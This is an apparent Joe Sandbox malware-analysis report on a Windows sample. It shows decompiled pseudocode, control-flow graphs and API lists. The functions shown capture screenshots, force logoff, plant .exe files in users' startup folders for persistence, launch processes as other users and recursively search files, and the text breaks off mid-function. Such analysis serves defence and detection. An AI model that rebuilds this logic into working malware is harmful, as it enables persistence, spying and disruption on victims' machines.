            • FreeLibrary.KERNEL32(000001F4,?,?,?), ref: 004102EB
            • FreeLibrary.KERNEL32(?,?,?,?), ref: 004102F5
            • FreeLibrary.KERNEL32(?,?,?,?), ref: 004102FF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
            • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
            • API String ID: 1554524784-1167942225
            • Opcode ID: 7d0c615cc9c77ff9687a49a3b7338600e7575468cc622ecd9a8ad73826cc4663
            • Instruction ID: f429e62eea094673f0089e819726addd4f2a5fe35902f2d08e2196396ccc61b1
            • Opcode Fuzzy Hash: 7d0c615cc9c77ff9687a49a3b7338600e7575468cc622ecd9a8ad73826cc4663
            • Instruction Fuzzy Hash: 6BE1D371D00259ABDF209FE5CD88AEEBFB9BF08301F14446BE515B2290D6B99D80DF58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404392 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 244synchronizationsleepshutdownCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 215 404392-4043ba call 415750 218 4043e6-4043ee 215->218 219 4043bc-4043d7 call 40401e 215->219 220 4043f4-4043ff call 405469 218->220 221 4044ca-4044cf 218->221 230 4043d9 219->230 231 4043dd-4043e1 call 4157f8 219->231 224 4046c5-4046d8 call 410418 220->224 233 404405-40442a call 403cc5 CreateMutexW 220->233 221->224 225 4044d5-4044e7 call 403d00 221->225 236 4046b4-4046b8 225->236 237 4044ed-40451d call 403cc5 OpenMutexW 225->237 230->231 231->218 244 404437 233->244 245 40442c-404435 call 413a5e 233->245 236->224 240 4046ba-4046c0 call 414a9d 236->240 246 40454f-404561 IsWellKnownSid 237->246 247 40451f-404520 CloseHandle 237->247 240->224 249 40443b-40443f 244->249 245->249 251 404571-404584 ReadProcessMemory 246->251 252 404563-40456c call 405838 246->252 250 404526-404539 ReadProcessMemory 247->250 249->224 254 404445-40445a call 4060a9 249->254 255 404542-40454d Sleep 250->255 256 40453b-404540 250->256 258 404586-40458b 251->258 259 4045e7-40460e call 4168e8 call 4051b8 251->259 268 4046ab-4046af call 413a4e 252->268 265 404463-40446f call 404d06 254->265 266 40445c 254->266 255->250 256->246 256->255 258->259 263 40458d-4045a1 GetFileAttributesExW 258->263 280 404612-404617 259->280 263->259 269 4045a3-4045e5 call 4168e8 call 405520 VirtualFree 263->269 278 404471-404478 ExitWindowsEx 265->278 279 40447e-4044a7 call 403cc5 OpenEventW 265->279 266->265 268->236 269->280 278->279 286 4044b3-4044c5 call 4040db CloseHandle 279->286 287 4044a9-4044b1 SetEvent CloseHandle 279->287 280->268 283 40461d-40463d call 411cdd 280->283 283->268 290 40463f-404673 call 403cc5 CreateEventW 283->290 286->224 287->286 294 404675-40467c WaitForSingleObject 290->294 295 40467e-404686 WaitForMultipleObjects 290->295 296 40468c-404690 294->296 295->296 297 404692-404696 CloseHandle 296->297 298 40469c-4046a9 CloseHandle * 2 296->298 297->298 298->268
            C-Code - Quality: 89%
            			E00404392(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4, char _a8) {
				char _v536;
				char _v540;
				char _v544;
				char _v644;
				signed char _v648;
				char _v748;
				short _v760;
				short _v772;
				char _v776;
				intOrPtr _v780;
				void _v784;
				void _v785;
				void* _v788;
				char _v789;
				void* _v792;
				void _v793;
				void* _v796;
				char _v797;
				void* _v800;
				char _v801;
				void* _v804;
				char _v813;
				void* _v817;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t73;
				void* _t78;
				intOrPtr* _t79;
				int _t81;
				void* _t83;
				void* _t87;
				void* _t91;
				int _t99;
				int _t108;
				void _t129;
				void* _t146;
				void* _t165;

				_t165 = __fp0;
				_t135 = __ecx;
				_t148 =  &_v776;
				_v785 = 0;
				if(E00415750(0, __ecx,  &_v776,  *0x41a2ec) != 0) {
					_v784 = _v772;
					_t129 = E0040401E( &_v784, __ecx, _v776);
					_v784 = _t129;
					if(_t129 == 0) {
						_v784 = 0;
					}
					E004157F8( &_v776);
				}
				if(_v784 != 0x1e6) {
					__eflags = _v784 - 0xc;
					if(__eflags != 0) {
						goto L42;
					}
					_t73 = E00403D00(_t135, __eflags, 0x8789347b, 2);
					_v792 = _t73;
					__eflags = _t73;
					if(_t73 == 0) {
						L40:
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							E00414A9D(0, _t148,  *0x41a2ec);
						}
						goto L42;
					}
					E00403CC5(0x19367400,  &_v748, 1);
					_t78 = OpenMutexW(0x100000, 0,  &_v760);
					_t148 = GetFileAttributesExW;
					__eflags = _t78;
					if(_t78 == 0) {
						L24:
						_t79 =  *0x41a294; // 0x0
						__imp__IsWellKnownSid( *_t79, 0x16);
						__eflags = _t79 - 1;
						if(__eflags != 0) {
							_v793 = 0;
							_t81 = ReadProcessMemory(0xffffffff, _t148,  &_v793, 1, 0);
							__eflags = _t81;
							if(_t81 == 0) {
								L30:
								_push( *((intOrPtr*)(_v788 + 4)));
								_t83 = E004168E8(_t135, E004051B8,  *((intOrPtr*)(_v788 + 8)));
								_t148 = 0x41a2f0;
								_v801 = E004051B8(_t83, 0, 0x41a2f0,  &_v540, E004051B8, 0x41a2f0);
								L31:
								__eflags = _v797 - 1;
								if(_v797 == 1) {
									_t87 = E00411CDD( &_v536, 0, _t148, 0,  &_v776);
									__eflags = _t87;
									_v817 = _t87 != 0;
									__eflags = _v817;
									if(_v817 != 0) {
										E00403CC5(0x2a43533f,  &_v760, 1);
										_t91 = CreateEventW(0x41a2c8, 1, 0,  &_v772);
										_t148 = _v788;
										_v800 = _t91;
										_v796 = _t148;
										_push(0xffffffff);
										__eflags = _t91;
										if(_t91 != 0) {
											WaitForMultipleObjects(2,  &_v788, 0, ??);
										} else {
											WaitForSingleObject(_t148, ??);
										}
										__eflags = _v788;
										if(_v788 != 0) {
											CloseHandle(_v788);
										}
										CloseHandle(_v772);
										CloseHandle(_t148);
									}
								}
								L39:
								E00413A4E(_v796);
								goto L40;
							}
							__eflags = _v793 - 0xe9;
							if(_v793 != 0xe9) {
								goto L30;
							}
							_t99 = GetFileAttributesExW(0x41a702, 0x78f16360,  &_v784);
							__eflags = _t99 - 1;
							if(_t99 != 1) {
								goto L30;
							}
							_push( *((intOrPtr*)(_v792 + 4)));
							E004168E8(_t135, E00405520,  *_v792);
							_push(_a4);
							_t148 = 0x41a2f0;
							_push( &_v544);
							_v813 = E00405520( &_v544, 0, _v796, 0x41a2f0, E00405520, 0x41a2f0, _t165);
							VirtualFree(_v804, 0, 0x8000);
							goto L31;
						}
						_v793 = E00405838(__eflags);
						goto L39;
					}
					CloseHandle(_t78);
					while(1) {
						_v785 = 0;
						_t108 = ReadProcessMemory(0xffffffff, _t148,  &_v785, 1, 0);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L23;
						}
						__eflags = _v785 - 0xe9;
						if(_v785 == 0xe9) {
							goto L24;
						}
						L23:
						Sleep(0x1f4);
					}
				} else {
					if(E00405469(_t135, _v780) != 0) {
						E00403CC5(0x38901130,  &_v748, 1);
						if(CreateMutexW(0x41a2c8, 1,  &_v760) == 0) {
							_v784 = 0;
						} else {
							_v784 = E00413A5E(_t113);
						}
						if(_v784 != 0) {
							E004060A9(_t135,  &_v644);
							if((_v648 & 0x00000020) != 0) {
								 *0x41a290 =  *0x41a290 | 0x00000008;
							}
							E00404D06();
							if(( *0x41a290 & 0x00000008) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E00403CC5(0x2a43533f,  &_v748, 1);
							_t146 = OpenEventW(2, 0,  &_v760);
							if(_t146 != 0) {
								SetEvent(_t146);
								CloseHandle(_t146);
							}
							E004040DB(1);
							_v789 = 1;
							CloseHandle(_v788);
						}
					}
					L42:
					E00410418(_v780);
					return _v789;
				}
			}










































            0x00404392
            0x00404392
            0x004043ab
            0x004043af
            0x004043ba
            0x004043c4
            0x004043cc
            0x004043d1
            0x004043d7
            0x004043d9
            0x004043d9
            0x004043e1
            0x004043e1
            0x004043ee
            0x004044ca
            0x004044cf
            0x00000000
            0x00000000
            0x004044dc
            0x004044e1
            0x004044e5
            0x004044e7
            0x004046b4
            0x004046b4
            0x004046b8
            0x004046c0
            0x004046c0
            0x00000000
            0x004046b8
            0x004044f9
            0x00404509
            0x0040450f
            0x0040451b
            0x0040451d
            0x0040454f
            0x0040454f
            0x00404558
            0x0040455e
            0x00404561
            0x0040457c
            0x00404580
            0x00404582
            0x00404584
            0x004045e7
            0x004045eb
            0x004045f6
            0x004045fb
            0x0040460e
            0x00404612
            0x00404612
            0x00404617
            0x0040462d
            0x00404632
            0x00404634
            0x00404639
            0x0040463d
            0x0040464b
            0x0040465d
            0x00404663
            0x00404667
            0x0040466b
            0x0040466f
            0x00404671
            0x00404673
            0x00404686
            0x00404675
            0x00404676
            0x00404676
            0x0040468c
            0x00404690
            0x00404696
            0x00404696
            0x004046a6
            0x004046a9
            0x004046a9
            0x0040463d
            0x004046ab
            0x004046af
            0x00000000
            0x004046af
            0x00404586
            0x0040458b
            0x00000000
            0x00000000
            0x0040459c
            0x0040459e
            0x004045a1
            0x00000000
            0x00000000
            0x004045a7
            0x004045b1
            0x004045b6
            0x004045c4
            0x004045c9
            0x004045db
            0x004045df
            0x00000000
            0x004045df
            0x00404568
            0x00000000
            0x00404568
            0x00404520
            0x00404526
            0x00404531
            0x00404535
            0x00404537
            0x00404539
            0x00000000
            0x00000000
            0x0040453b
            0x00404540
            0x00000000
            0x00000000
            0x00404542
            0x00404547
            0x00404547
            0x004043f4
            0x004043ff
            0x00404411
            0x0040442a
            0x00404437
            0x0040442c
            0x00404431
            0x00404431
            0x0040443f
            0x0040444d
            0x0040445a
            0x0040445c
            0x0040445c
            0x00404463
            0x0040446f
            0x00404478
            0x00404478
            0x0040448a
            0x004044a3
            0x004044a7
            0x004044aa
            0x004044b1
            0x004044b1
            0x004044b5
            0x004044be
            0x004044c3
            0x004044c3
            0x0040443f
            0x004046c5
            0x004046c9
            0x004046d8
            0x004046d8

            APIs
              • Part of subcall function 00415750: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,004043B8,?,?,00000000), ref: 00415775
              • Part of subcall function 00415750: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,004043B8,?,?,00000000), ref: 00415788
            • CreateMutexW.KERNEL32(0041A2C8,00000001,?,38901130,?,00000001,?), ref: 00404422
            • ExitWindowsEx.USER32(00000014,80000000), ref: 00404478
            • OpenEventW.KERNEL32(00000002,00000000,?,2A43533F,?,00000001), ref: 00404497
            • SetEvent.KERNEL32(00000000), ref: 004044AA
            • CloseHandle.KERNEL32(00000000), ref: 004044B1
            • CloseHandle.KERNEL32(000001E6,00000001), ref: 004044C3
            • OpenMutexW.KERNEL32(00100000,00000000,?,19367400,?,00000001,8789347B,00000002), ref: 00404509
            • CloseHandle.KERNEL32(00000000), ref: 00404520
            • ReadProcessMemory.KERNEL32(000000FF,7620F9B0,00000000,00000001,00000000), ref: 00404535
            • Sleep.KERNEL32(000001F4), ref: 00404547
            • IsWellKnownSid.ADVAPI32(00000000,00000016), ref: 00404558
            • ReadProcessMemory.KERNEL32(000000FF,7620F9B0,00000000,00000001,00000000), ref: 00404580
            • VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 004045DF
            • GetFileAttributesExW.KERNEL32(0041A702,78F16360,?), ref: 0040459C
              • Part of subcall function 004168E8: VirtualProtect.KERNEL32(004051B8,?,00000040,00000000,7620F9B0,?,?,004045FB,00000001,?), ref: 004168FD
              • Part of subcall function 004168E8: VirtualProtect.KERNEL32(004051B8,?,00000000,00000000,?,?,004045FB,00000001,?), ref: 00416930
            • CreateEventW.KERNEL32(0041A2C8,00000001,00000000,?,2A43533F,?,00000001,00000001,?,00000000,0041A2F0,00000000,?,00000001,?), ref: 0040465D
            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404676
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00404686
            • CloseHandle.KERNEL32(?), ref: 00404696
            • CloseHandle.KERNEL32(?), ref: 004046A6
            • CloseHandle.KERNEL32(?), ref: 004046A9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseHandle$CreateEventFileVirtual$MemoryMutexOpenProcessProtectReadWait$AttributesExitFreeKnownMultipleObjectObjectsSingleSizeSleepWellWindows
            • String ID:
            • API String ID: 3536541236-3916222277
            • Opcode ID: d0ff7cacfb7bbb368fd0cb2b8f1319355dd092e854707bbf70fe93a17844206b
            • Instruction ID: 0570cbbd4e6b7887250b709a7b465c8e14734cf32ab0943f83678e72b77f4c54
            • Opcode Fuzzy Hash: d0ff7cacfb7bbb368fd0cb2b8f1319355dd092e854707bbf70fe93a17844206b
            • Instruction Fuzzy Hash: 9691C471108345AFD710EF618D45EAF7BE8AB89714F40093EF680B62E1D739D9488B6B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405838 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 709 405838-405863 call 40f369 LoadLibraryW 712 405900-405902 709->712 713 405869-405882 call 40f333 GetProcAddress 709->713 714 405a6e-405a72 712->714 717 4058f4-4058fe FreeLibrary 713->717 718 405884-40589b 713->718 717->712 719 405907-40590d 717->719 718->717 722 40589d-4058b3 SHGetFolderPathW 718->722 721 405912-405935 NetUserEnum 719->721 723 405942-405945 721->723 724 405937-40593c 721->724 722->717 725 4058b5-4058d6 call 411098 StrCmpNIW 722->725 727 405a12-405a19 723->727 728 40594b-405950 723->728 724->723 726 405a1f-405a38 SHGetFolderPathW 724->726 725->717 739 4058d8-4058f0 call 4107c1 725->739 730 405a3a-405a53 call 41484c 726->730 731 405a6b 726->731 727->721 727->726 732 405956-40596a NetUserGetInfo 728->732 733 405a0a-405a0d NetApiBufferFree 728->733 730->731 743 405a55-405a65 call 404f83 730->743 731->714 734 405a00-405a04 732->734 735 405970-405975 732->735 733->727 734->732 734->733 735->734 738 40597b-40598c call 40f504 735->738 747 4059f8-4059fb NetApiBufferFree 738->747 748 40598e-4059a3 call 415d45 738->748 739->717 743->731 751 405a67 743->751 747->734 748->747 753 4059a5-4059b3 call 415ac4 748->753 751->731 753->747 756 4059b5-4059ce call 41484c 753->756 756->747 759 4059d0-4059e0 call 404f83 756->759 759->747 762 4059e2-4059f3 call 4050b0 759->762 762->747
            C-Code - Quality: 81%
            			E00405838(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E0040F369(0xae, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E0040F333(0xaf, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E00411098(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E004107C1(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E0040F504( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E00415D45( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E00415AC4( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E0041484C(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E00404F83( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E004050B0( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E0041484C(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E00404F83(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}


































            0x00405846
            0x0040584e
            0x00405851
            0x0040585f
            0x00405863
            0x00405900
            0x00000000
            0x00405869
            0x00405869
            0x00405871
            0x0040587a
            0x00405882
            0x00405887
            0x00405888
            0x0040588e
            0x0040588f
            0x0040589b
            0x0040589d
            0x004058ab
            0x004058b3
            0x004058b5
            0x004058bb
            0x004058c1
            0x004058d6
            0x004058db
            0x004058eb
            0x004058f0
            0x004058f0
            0x004058d6
            0x004058b3
            0x0040589b
            0x004058f5
            0x004058fe
            0x00405907
            0x0040590a
            0x0040590d
            0x00405912
            0x00405928
            0x0040592b
            0x00405930
            0x00405933
            0x00405935
            0x00405942
            0x00405942
            0x00405945
            0x00000000
            0x00000000
            0x0040594b
            0x0040594d
            0x00405950
            0x00405a0a
            0x00405a0d
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00405956
            0x00405956
            0x00405963
            0x00405968
            0x0040596a
            0x00405970
            0x00405973
            0x00405975
            0x0040597b
            0x00405985
            0x0040598a
            0x0040598c
            0x0040599c
            0x004059a1
            0x004059a3
            0x004059ac
            0x004059b1
            0x004059b3
            0x004059cc
            0x004059ce
            0x004059de
            0x004059e0
            0x004059ef
            0x004059f3
            0x004059f3
            0x004059e0
            0x004059ce
            0x004059b3
            0x004059a3
            0x004059fb
            0x004059fb
            0x00405975
            0x00405a00
            0x00405a01
            0x00405a01
            0x00000000
            0x00405956
            0x00405937
            0x0040593c
            0x00000000
            0x00000000
            0x00000000
            0x00405a12
            0x00405a12
            0x00405a12
            0x00405a1f
            0x00405a30
            0x00405a36
            0x00405a38
            0x00405a51
            0x00405a53
            0x00405a5e
            0x00405a63
            0x00405a65
            0x00405a67
            0x00405a67
            0x00405a65
            0x00405a53
            0x00000000
            0x00405a6b
            0x00000000
            0x004058fe

            APIs
            • LoadLibraryW.KERNEL32(?,761B5B60,7620F9B0,00000000), ref: 00405859
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040587A
            • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 004058AB
            • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 004058CE
            • FreeLibrary.KERNEL32(00000000), ref: 004058F5
            • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 0040592B
            • NetUserGetInfo.NETAPI32(00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00405963
            • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 004059FB
            • NetApiBufferFree.NETAPI32(?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00405A0D
            • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?,00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00405A30
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
            • String ID: .exe
            • API String ID: 1753652487-4119554291
            • Opcode ID: b4113bde39edea5eacf7a11ac19038a1ec4d2c8bd4da7d4e25e0dc7e5bdef474
            • Instruction ID: 2e6b0f9464f0d21a44254aa70c38c5ad5f317791c8adbc37b3a985964a75f40a
            • Opcode Fuzzy Hash: b4113bde39edea5eacf7a11ac19038a1ec4d2c8bd4da7d4e25e0dc7e5bdef474
            • Instruction Fuzzy Hash: 54518FB1900618AADF20EBA4CC84FEF77BCEB45314F0045BAB551F7192D6399A498F68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00411D38 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90libraryloaderprocessCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 866 411d38-411d54 LoadLibraryA 867 411d5a-411d7b GetProcAddress * 2 866->867 868 411e1c-411e22 866->868 869 411e11-411e1b FreeLibrary 867->869 870 411d81-411d83 867->870 869->868 870->869 871 411d89-411d98 870->871 873 411d9a 871->873 874 411d9d-411dbc call 4104cb 871->874 873->874 877 411dc1-411ded CreateProcessAsUserW 874->877 878 411dbe 874->878 879 411e06-411e09 877->879 880 411def-411e02 CloseHandle * 2 877->880 878->877 879->869 881 411e0b 879->881 880->879 881->869
            C-Code - Quality: 58%
            			E00411D38(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E004104CB( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}















            0x00411d46
            0x00411d49
            0x00411d4f
            0x00411d54
            0x00411d72
            0x00411d74
            0x00411d76
            0x00411d7b
            0x00411d89
            0x00411d8a
            0x00411d90
            0x00411d91
            0x00411d98
            0x00411d9a
            0x00411d9a
            0x00411d9f
            0x00411da3
            0x00411dac
            0x00411db1
            0x00411db4
            0x00411db7
            0x00411dbc
            0x00411dbe
            0x00411dbe
            0x00411dd0
            0x00411ded
            0x00411df8
            0x00411dfd
            0x00411e02
            0x00411e02
            0x00411e09
            0x00411e0e
            0x00411e0e
            0x00411e09
            0x00411e14
            0x00411e1b
            0x00411e22

            APIs
            • LoadLibraryA.KERNEL32(userenv.dll,00000001), ref: 00411D49
            • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00411D68
            • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00411D74
            • CreateProcessAsUserW.ADVAPI32(?,00000000,00405093,00000000,00000000,00000000,00405093,00405093,00000000,?,?,?,00000000,00000044), ref: 00411DE5
            • CloseHandle.KERNEL32(?), ref: 00411DF8
            • CloseHandle.KERNEL32(?), ref: 00411DFD
            • FreeLibrary.KERNEL32(?), ref: 00411E14
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
            • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
            • API String ID: 3080530829-1103369309
            • Opcode ID: a3f3ac57ce7f1394c0d21c175224517e03010a6eb915f55cc6c73d2daa4fd471
            • Instruction ID: 2e7cdb2c0a66f9eb63995a55435bba8bb47d36db070de9df0429496f699640a4
            • Opcode Fuzzy Hash: a3f3ac57ce7f1394c0d21c175224517e03010a6eb915f55cc6c73d2daa4fd471
            • Instruction Fuzzy Hash: 1B21FAB2D0025DBBDF109FE5CC849EEBBBCEB08344B10446AE615B6160D6399E55CB64
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00415BE8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109sleepfilesynchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E00415BE8(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E00415D45(0x4034fc,  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E00415A06( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= 0) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00415D45( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									_t38 =  &_a28; // 0x407c5c
									E00415BE8( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24,  *_t38);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
